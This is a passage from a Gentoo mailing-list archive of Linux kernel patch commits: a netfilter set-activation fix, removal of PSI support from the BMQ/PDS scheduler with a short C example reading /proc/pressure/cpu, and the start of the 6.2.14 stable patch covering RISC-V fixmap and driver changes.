+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cecf8ab90e58f..03ef4fdaa460b 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index cb37169608bab..a48dd5b5d45b1 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+-- 
+cgit 
+


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-10 16:08 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-10 16:08 UTC (permalink / raw
  To: gentoo-commits

commit:     0d62c0fdfda6ebc693ddcfb5841feb69c44391f7
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 16:04:51 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 16:04:51 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0d62c0fd

sched/alt: Remove psi support

Bug: https://bugs.gentoo.org/904514

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  4 ++
 5022_BMQ-and-PDS-remove-psi-support.patch | 94 +++++++++++++++++++++++++++++++
 2 files changed, 98 insertions(+)

diff --git a/0000_README b/0000_README
index d3c9fbfe..00341fe3 100644
--- a/0000_README
+++ b/0000_README
@@ -146,3 +146,7 @@ Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incl
 Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
 From:   https://gitweb.gentoo.org/proj/linux-patches.git/
 Desc:   Set defaults for BMQ. Add archs as people test, default to N
+
+Patch:  5022_BMQ-and-PDS-remove-psi-support.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Sched/alt: Remove psi support 

diff --git a/5022_BMQ-and-PDS-remove-psi-support.patch b/5022_BMQ-and-PDS-remove-psi-support.patch
new file mode 100644
index 00000000..4390e2d5
--- /dev/null
+++ b/5022_BMQ-and-PDS-remove-psi-support.patch
@@ -0,0 +1,94 @@
+From 542887ccaeadc65843ec171bccc87f8aa8bbca95 Mon Sep 17 00:00:00 2001
+From: Alfred Chen <cchalpha@gmail.com>
+Date: Wed, 26 Apr 2023 16:38:14 +0000
+Subject: [PATCH] sched/alt: Remove psi support
+
+There are issues(#70, #72, #79) with psi support. Removing the
+support of psi as it doesn't bring much gain.
+---
+ init/Kconfig             | 1 +
+ kernel/sched/alt_core.c  | 8 --------
+ kernel/sched/alt_sched.h | 1 -
+ 3 files changed, 1 insertion(+), 9 deletions(-)
+
+diff --git a/init/Kconfig b/init/Kconfig
+index 454f792df9dd..dff86592555a 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -629,6 +629,7 @@ config TASK_IO_ACCOUNTING
+ 
+ config PSI
+ 	bool "Pressure stall information tracking"
++	depends on !SCHED_ALT
+ 	help
+ 	  Collect metrics that indicate how overcommitted the CPU, memory,
+ 	  and IO capacity are in the system.
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index af4d840d4bb7..37dfdc41d2a7 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -588,7 +588,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
+ 
+ 	rq->prev_irq_time += irq_delta;
+ 	delta -= irq_delta;
+-	psi_account_irqtime(rq->curr, irq_delta);
+ #endif
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+ 	if (static_key_false((&paravirt_steal_rq_enabled))) {
+@@ -769,7 +768,6 @@ unsigned long get_wchan(struct task_struct *p)
+  */
+ #define __SCHED_DEQUEUE_TASK(p, rq, flags, func)				\
+ 	sched_info_dequeue(rq, p);						\
+-	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
+ 										\
+ 	list_del(&p->sq_node);							\
+ 	if (list_empty(&rq->queue.heads[p->sq_idx])) { 				\
+@@ -779,7 +777,6 @@ unsigned long get_wchan(struct task_struct *p)
+ 
+ #define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
+ 	sched_info_enqueue(rq, p);					\
+-	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
+ 									\
+ 	p->sq_idx = task_sched_prio_idx(p, rq);				\
+ 	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
+@@ -2954,7 +2951,6 @@ static int try_to_wake_up(struct task_struct *p, unsigned int state,
+ 		}
+ 
+ 		wake_flags |= WF_MIGRATED;
+-		psi_ttwu_dequeue(p);
+ 		set_task_cpu(p, cpu);
+ 	}
+ #else
+@@ -4828,8 +4824,6 @@ static void __sched notrace __schedule(unsigned int sched_mode)
+ 		 */
+ 		++*switch_count;
+ 
+-		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
+-
+ 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
+ 
+ 		/* Also unlocks the rq: */
+@@ -7689,8 +7683,6 @@ void __init sched_init(void)
+ 	sched_init_topology_cpumask_early();
+ #endif /* SMP */
+ 
+-	psi_init();
+-
+ 	preempt_dynamic_init();
+ }
+ 
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+index 9fe45bf0cedf..55a15b806e87 100644
+--- a/kernel/sched/alt_sched.h
++++ b/kernel/sched/alt_sched.h
+@@ -3,7 +3,6 @@
+ 
+ #include <linux/context_tracking.h>
+ #include <linux/profile.h>
+-#include <linux/psi.h>
+ #include <linux/stop_machine.h>
+ #include <linux/syscalls.h>
+ #include <linux/tick.h>
+-- 
+GitLab
+


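To see what this removal means in practice: with CONFIG_PSI gated behind
!SCHED_ALT, a BMQ/PDS kernel no longer exposes the /proc/pressure files at
all. Below is a minimal C sketch of the interface that goes away
(illustration only, not part of the patch; it assumes a PSI-enabled kernel
where /proc/pressure/cpu exists):

  #include <stdio.h>
  #include <stdlib.h>

  /* Minimal illustration (not from the patch above): dump the PSI CPU
   * pressure file. On a kernel built with SCHED_ALT, CONFIG_PSI is now
   * forced off and /proc/pressure/cpu does not exist, so fopen() fails. */
  int main(void)
  {
          char line[256];
          FILE *f = fopen("/proc/pressure/cpu", "r");

          if (!f) {
                  perror("fopen /proc/pressure/cpu");
                  return EXIT_FAILURE;
          }
          while (fgets(line, sizeof(line), f))
                  fputs(line, stdout); /* e.g. "some avg10=0.00 avg60=0.00 ..." */
          fclose(f);
          return EXIT_SUCCESS;
  }

On a kernel carrying this patch the fopen() fails with ENOENT, which is also
the quickest way to confirm that PSI really is compiled out.
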
^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-30 23:50 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-04-30 23:50 UTC (permalink / raw
  To: gentoo-commits

commit:     1630d83b829a06d7e27586ebfde8ec65657f37f3
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sun Apr 30 23:50:27 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sun Apr 30 23:50:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1630d83b

Linux patch 6.2.14

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |   4 +
 1013_linux-6.2.14.patch | 693 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 697 insertions(+)

diff --git a/0000_README b/0000_README
index bb52a583..d3c9fbfe 100644
--- a/0000_README
+++ b/0000_README
@@ -95,6 +95,10 @@ Patch:  1012_linux-6.2.13.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.13
 
+Patch:  1013_linux-6.2.14.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.14
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1013_linux-6.2.14.patch b/1013_linux-6.2.14.patch
new file mode 100644
index 00000000..8d950164
--- /dev/null
+++ b/1013_linux-6.2.14.patch
@@ -0,0 +1,693 @@
+diff --git a/Documentation/riscv/vm-layout.rst b/Documentation/riscv/vm-layout.rst
+index 3be44e74ec5d6..5462c84f4723f 100644
+--- a/Documentation/riscv/vm-layout.rst
++++ b/Documentation/riscv/vm-layout.rst
+@@ -47,7 +47,7 @@ RISC-V Linux Kernel SV39
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffffffc6fee00000 | -228    GB | ffffffc6feffffff |    2 MB | fixmap
++   ffffffc6fea00000 | -228    GB | ffffffc6feffffff |    6 MB | fixmap
+    ffffffc6ff000000 | -228    GB | ffffffc6ffffffff |   16 MB | PCI io
+    ffffffc700000000 | -228    GB | ffffffc7ffffffff |    4 GB | vmemmap
+    ffffffc800000000 | -224    GB | ffffffd7ffffffff |   64 GB | vmalloc/ioremap space
+@@ -83,7 +83,7 @@ RISC-V Linux Kernel SV48
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffff8d7ffee00000 |  -114.5 TB | ffff8d7ffeffffff |    2 MB | fixmap
++   ffff8d7ffea00000 |  -114.5 TB | ffff8d7ffeffffff |    6 MB | fixmap
+    ffff8d7fff000000 |  -114.5 TB | ffff8d7fffffffff |   16 MB | PCI io
+    ffff8d8000000000 |  -114.5 TB | ffff8f7fffffffff |    2 TB | vmemmap
+    ffff8f8000000000 |  -112.5 TB | ffffaf7fffffffff |   32 TB | vmalloc/ioremap space
+@@ -119,7 +119,7 @@ RISC-V Linux Kernel SV57
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ff1bfffffee00000 | -57     PB | ff1bfffffeffffff |    2 MB | fixmap
++   ff1bfffffea00000 | -57     PB | ff1bfffffeffffff |    6 MB | fixmap
+    ff1bffffff000000 | -57     PB | ff1bffffffffffff |   16 MB | PCI io
+    ff1c000000000000 | -57     PB | ff1fffffffffffff |    1 PB | vmemmap
+    ff20000000000000 | -56     PB | ff5fffffffffffff |   16 PB | vmalloc/ioremap space
+diff --git a/Makefile b/Makefile
+index f76a4a63aaf5a..031d40ad0bd9d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 13
++SUBLEVEL = 14
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/riscv/include/asm/fixmap.h b/arch/riscv/include/asm/fixmap.h
+index 5c3e7b97fcc6f..0a55099bb7349 100644
+--- a/arch/riscv/include/asm/fixmap.h
++++ b/arch/riscv/include/asm/fixmap.h
+@@ -22,6 +22,14 @@
+  */
+ enum fixed_addresses {
+ 	FIX_HOLE,
++	/*
++	 * The fdt fixmap mapping must be PMD aligned and will be mapped
++	 * using PMD entries in fixmap_pmd in 64-bit and a PGD entry in 32-bit.
++	 */
++	FIX_FDT_END,
++	FIX_FDT = FIX_FDT_END + FIX_FDT_SIZE / PAGE_SIZE - 1,
++
++	/* Below fixmaps will be mapped using fixmap_pte */
+ 	FIX_PTE,
+ 	FIX_PMD,
+ 	FIX_PUD,
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 6da0f3285dd2e..f1ef0c3f905a0 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -87,9 +87,13 @@
+ 
+ #define FIXADDR_TOP      PCI_IO_START
+ #ifdef CONFIG_64BIT
+-#define FIXADDR_SIZE     PMD_SIZE
++#define MAX_FDT_SIZE	 PMD_SIZE
++#define FIX_FDT_SIZE	 (MAX_FDT_SIZE + SZ_2M)
++#define FIXADDR_SIZE     (PMD_SIZE + FIX_FDT_SIZE)
+ #else
+-#define FIXADDR_SIZE     PGDIR_SIZE
++#define MAX_FDT_SIZE	 PGDIR_SIZE
++#define FIX_FDT_SIZE	 MAX_FDT_SIZE
++#define FIXADDR_SIZE     (PGDIR_SIZE + FIX_FDT_SIZE)
+ #endif
+ #define FIXADDR_START    (FIXADDR_TOP - FIXADDR_SIZE)
+ 
+diff --git a/arch/riscv/kernel/setup.c b/arch/riscv/kernel/setup.c
+index 86acd690d5293..2acf51c235673 100644
+--- a/arch/riscv/kernel/setup.c
++++ b/arch/riscv/kernel/setup.c
+@@ -278,12 +278,8 @@ void __init setup_arch(char **cmdline_p)
+ #if IS_ENABLED(CONFIG_BUILTIN_DTB)
+ 	unflatten_and_copy_device_tree();
+ #else
+-	if (early_init_dt_verify(__va(XIP_FIXUP(dtb_early_pa))))
+-		unflatten_device_tree();
+-	else
+-		pr_err("No DTB found in kernel mappings\n");
++	unflatten_device_tree();
+ #endif
+-	early_init_fdt_scan_reserved_mem();
+ 	misc_mem_init();
+ 
+ 	init_resources();
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 478d6763a01a1..0f14f4a8d179a 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -57,7 +57,6 @@ unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)]
+ EXPORT_SYMBOL(empty_zero_page);
+ 
+ extern char _start[];
+-#define DTB_EARLY_BASE_VA      PGDIR_SIZE
+ void *_dtb_early_va __initdata;
+ uintptr_t _dtb_early_pa __initdata;
+ 
+@@ -236,31 +235,22 @@ static void __init setup_bootmem(void)
+ 	set_max_mapnr(max_low_pfn - ARCH_PFN_OFFSET);
+ 
+ 	reserve_initrd_mem();
++
++	/*
++	 * No allocation should be done before reserving the memory as defined
++	 * in the device tree, otherwise the allocation could end up in a
++	 * reserved region.
++	 */
++	early_init_fdt_scan_reserved_mem();
++
+ 	/*
+ 	 * If DTB is built in, no need to reserve its memblock.
+ 	 * Otherwise, do reserve it but avoid using
+ 	 * early_init_fdt_reserve_self() since __pa() does
+ 	 * not work for DTB pointers that are fixmap addresses
+ 	 */
+-	if (!IS_ENABLED(CONFIG_BUILTIN_DTB)) {
+-		/*
+-		 * In case the DTB is not located in a memory region we won't
+-		 * be able to locate it later on via the linear mapping and
+-		 * get a segfault when accessing it via __va(dtb_early_pa).
+-		 * To avoid this situation copy DTB to a memory region.
+-		 * Note that memblock_phys_alloc will also reserve DTB region.
+-		 */
+-		if (!memblock_is_memory(dtb_early_pa)) {
+-			size_t fdt_size = fdt_totalsize(dtb_early_va);
+-			phys_addr_t new_dtb_early_pa = memblock_phys_alloc(fdt_size, PAGE_SIZE);
+-			void *new_dtb_early_va = early_memremap(new_dtb_early_pa, fdt_size);
+-
+-			memcpy(new_dtb_early_va, dtb_early_va, fdt_size);
+-			early_memunmap(new_dtb_early_va, fdt_size);
+-			_dtb_early_pa = new_dtb_early_pa;
+-		} else
+-			memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+-	}
++	if (!IS_ENABLED(CONFIG_BUILTIN_DTB))
++		memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+ 
+ 	dma_contiguous_reserve(dma32_phys_limit);
+ 	if (IS_ENABLED(CONFIG_64BIT))
+@@ -279,9 +269,6 @@ pgd_t trampoline_pg_dir[PTRS_PER_PGD] __page_aligned_bss;
+ static pte_t fixmap_pte[PTRS_PER_PTE] __page_aligned_bss;
+ 
+ pgd_t early_pg_dir[PTRS_PER_PGD] __initdata __aligned(PAGE_SIZE);
+-static p4d_t __maybe_unused early_dtb_p4d[PTRS_PER_P4D] __initdata __aligned(PAGE_SIZE);
+-static pud_t __maybe_unused early_dtb_pud[PTRS_PER_PUD] __initdata __aligned(PAGE_SIZE);
+-static pmd_t __maybe_unused early_dtb_pmd[PTRS_PER_PMD] __initdata __aligned(PAGE_SIZE);
+ 
+ #ifdef CONFIG_XIP_KERNEL
+ #define pt_ops			(*(struct pt_alloc_ops *)XIP_FIXUP(&pt_ops))
+@@ -626,9 +613,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define trampoline_pgd_next	(pgtable_l5_enabled ?			\
+ 		(uintptr_t)trampoline_p4d : (pgtable_l4_enabled ?	\
+ 		(uintptr_t)trampoline_pud : (uintptr_t)trampoline_pmd))
+-#define early_dtb_pgd_next	(pgtable_l5_enabled ?			\
+-		(uintptr_t)early_dtb_p4d : (pgtable_l4_enabled ?	\
+-		(uintptr_t)early_dtb_pud : (uintptr_t)early_dtb_pmd))
+ #else
+ #define pgd_next_t		pte_t
+ #define alloc_pgd_next(__va)	pt_ops.alloc_pte(__va)
+@@ -636,7 +620,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define create_pgd_next_mapping(__nextp, __va, __pa, __sz, __prot)	\
+ 	create_pte_mapping(__nextp, __va, __pa, __sz, __prot)
+ #define fixmap_pgd_next		((uintptr_t)fixmap_pte)
+-#define early_dtb_pgd_next	((uintptr_t)early_dtb_pmd)
+ #define create_p4d_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pud_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pmd_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+@@ -860,32 +843,28 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir, uintptr_t dtb_pa)
++static void __init create_fdt_early_page_table(pgd_t *pgdir,
++					       uintptr_t fix_fdt_va,
++					       uintptr_t dtb_pa)
+ {
+-#ifndef CONFIG_BUILTIN_DTB
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+ 
+-	create_pgd_mapping(early_pg_dir, DTB_EARLY_BASE_VA,
+-			   IS_ENABLED(CONFIG_64BIT) ? early_dtb_pgd_next : pa,
+-			   PGDIR_SIZE,
+-			   IS_ENABLED(CONFIG_64BIT) ? PAGE_TABLE : PAGE_KERNEL);
+-
+-	if (pgtable_l5_enabled)
+-		create_p4d_mapping(early_dtb_p4d, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pud, P4D_SIZE, PAGE_TABLE);
+-
+-	if (pgtable_l4_enabled)
+-		create_pud_mapping(early_dtb_pud, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pmd, PUD_SIZE, PAGE_TABLE);
++#ifndef CONFIG_BUILTIN_DTB
++	/* Make sure the fdt fixmap address is always aligned on PMD size */
++	BUILD_BUG_ON(FIX_FDT % (PMD_SIZE / PAGE_SIZE));
+ 
+-	if (IS_ENABLED(CONFIG_64BIT)) {
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA,
++	/* In 32-bit only, the fdt lies in its own PGD */
++	if (!IS_ENABLED(CONFIG_64BIT)) {
++		create_pgd_mapping(early_pg_dir, fix_fdt_va,
++				   pa, MAX_FDT_SIZE, PAGE_KERNEL);
++	} else {
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va,
+ 				   pa, PMD_SIZE, PAGE_KERNEL);
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA + PMD_SIZE,
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va + PMD_SIZE,
+ 				   pa + PMD_SIZE, PMD_SIZE, PAGE_KERNEL);
+ 	}
+ 
+-	dtb_early_va = (void *)DTB_EARLY_BASE_VA + (dtb_pa & (PMD_SIZE - 1));
++	dtb_early_va = (void *)fix_fdt_va + (dtb_pa & (PMD_SIZE - 1));
+ #else
+ 	/*
+ 	 * For 64-bit kernel, __va can't be used since it would return a linear
+@@ -1055,7 +1034,8 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir, dtb_pa);
++	create_fdt_early_page_table(early_pg_dir,
++				    __fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+@@ -1097,6 +1077,16 @@ static void __init setup_vm_final(void)
+ 	u64 i;
+ 
+ 	/* Setup swapper PGD for fixmap */
++#if !defined(CONFIG_64BIT)
++	/*
++	 * In 32-bit, the device tree lies in a pgd entry, so it must be copied
++	 * directly in swapper_pg_dir in addition to the pgd entry that points
++	 * to fixmap_pte.
++	 */
++	unsigned long idx = pgd_index(__fix_to_virt(FIX_FDT));
++
++	set_pgd(&swapper_pg_dir[idx], early_pg_dir[idx]);
++#endif
+ 	create_pgd_mapping(swapper_pg_dir, FIXADDR_START,
+ 			   __pa_symbol(fixmap_pgd_next),
+ 			   PGDIR_SIZE, PAGE_TABLE);
+diff --git a/arch/x86/Makefile.um b/arch/x86/Makefile.um
+index b3c1ae084180d..1aa64846e5398 100644
+--- a/arch/x86/Makefile.um
++++ b/arch/x86/Makefile.um
+@@ -1,6 +1,17 @@
+ # SPDX-License-Identifier: GPL-2.0
+ core-y += arch/x86/crypto/
+ 
++#
++# Disable SSE and other FP/SIMD instructions to match normal x86
++# This is required to work around issues in older LLVM versions, but breaks
++# GCC versions < 11. See:
++# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=99652
++#
++ifeq ($(CONFIG_CC_IS_CLANG),y)
++KBUILD_CFLAGS += -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx
++KBUILD_RUSTFLAGS += -Ctarget-feature=-sse,-sse2,-sse3,-ssse3,-sse4.1,-sse4.2,-avx,-avx2
++endif
++
+ ifeq ($(CONFIG_X86_32),y)
+ START := 0x8048000
+ 
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 959fe018d0dd7..488f07314db34 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -718,7 +718,12 @@ static int really_probe_debug(struct device *dev, struct device_driver *drv)
+ 	calltime = ktime_get();
+ 	ret = really_probe(dev, drv);
+ 	rettime = ktime_get();
+-	pr_debug("probe of %s returned %d after %lld usecs\n",
++	/*
++	 * Don't change this to pr_debug() because that requires
++	 * CONFIG_DYNAMIC_DEBUG and we want a simple 'initcall_debug' on the
++	 * kernel commandline to print this all the time at the debug level.
++	 */
++	printk(KERN_DEBUG "probe of %s returned %d after %lld usecs\n",
+ 		 dev_name(dev), ret, ktime_us_delta(rettime, calltime));
+ 	return ret;
+ }
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index 7c9175619a1dc..e9c79f76f1b69 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -1627,6 +1627,19 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_interrupt = "AMDI0030:00@18",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 1.7.8
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/1722#note_1720627
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NL5xNU"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "ELAN0415:00@9",
++		},
++	},
+ 	{
+ 		/*
+ 		 * Spurious wakeups from TP_ATTN# pin
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 0d0c26ebab906..ecccd01850194 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -1558,6 +1558,9 @@ int drm_fb_helper_check_var(struct fb_var_screeninfo *var,
+ 		return -EINVAL;
+ 	}
+ 
++	var->xres_virtual = fb->width;
++	var->yres_virtual = fb->height;
++
+ 	/*
+ 	 * Workaround for SDL 1.2, which is known to be setting all pixel format
+ 	 * fields values to zero in some cases. We treat this situation as a
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+index 65d4799a56584..ff710b0b5071a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+@@ -965,6 +965,12 @@ out:
+ 		.driver_data = BRCMF_FWVENDOR_ ## fw_vend \
+ 	}
+ 
++#define CYW_SDIO_DEVICE(dev_id, fw_vend) \
++	{ \
++		SDIO_DEVICE(SDIO_VENDOR_ID_CYPRESS, dev_id), \
++		.driver_data = BRCMF_FWVENDOR_ ## fw_vend \
++	}
++
+ /* devices we support, null terminated */
+ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43143, WCC),
+@@ -979,6 +985,7 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4335_4339, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4339, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43430, WCC),
++	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43439, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4345, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43455, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4354, WCC),
+@@ -986,9 +993,9 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4359, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_4373, CYW),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43012, CYW),
+-	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439, CYW),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43752, CYW),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_89359, CYW),
++	CYW_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439, CYW),
+ 	{ /* end: all zeroes */ }
+ };
+ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids);
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index b115902eb475e..b8c99bfce963a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -6164,6 +6164,11 @@ static s32 brcmf_get_assoc_ies(struct brcmf_cfg80211_info *cfg,
+ 		(struct brcmf_cfg80211_assoc_ielen_le *)cfg->extra_buf;
+ 	req_len = le32_to_cpu(assoc_info->req_len);
+ 	resp_len = le32_to_cpu(assoc_info->resp_len);
++	if (req_len > WL_EXTRA_BUF_MAX || resp_len > WL_EXTRA_BUF_MAX) {
++		bphy_err(drvr, "invalid lengths in assoc info: req %u resp %u\n",
++			 req_len, resp_len);
++		return -EINVAL;
++	}
+ 	if (req_len) {
+ 		err = brcmf_fil_iovar_data_get(ifp, "assoc_req_ies",
+ 					       cfg->extra_buf,
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index f31cc3c763299..644a55447fd7f 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -595,6 +595,11 @@ static void option_instat_callback(struct urb *urb);
+ #define SIERRA_VENDOR_ID			0x1199
+ #define SIERRA_PRODUCT_EM9191			0x90d3
+ 
++/* UNISOC (Spreadtrum) products */
++#define UNISOC_VENDOR_ID			0x1782
++/* TOZED LT70-C based on UNISOC SL8563 uses UNISOC's vendor ID */
++#define TOZED_PRODUCT_LT70C			0x4055
++
+ /* Device flags */
+ 
+ /* Highest interface number which can be used with NCTRL() and RSVD() */
+@@ -2225,6 +2230,7 @@ static const struct usb_device_id option_ids[] = {
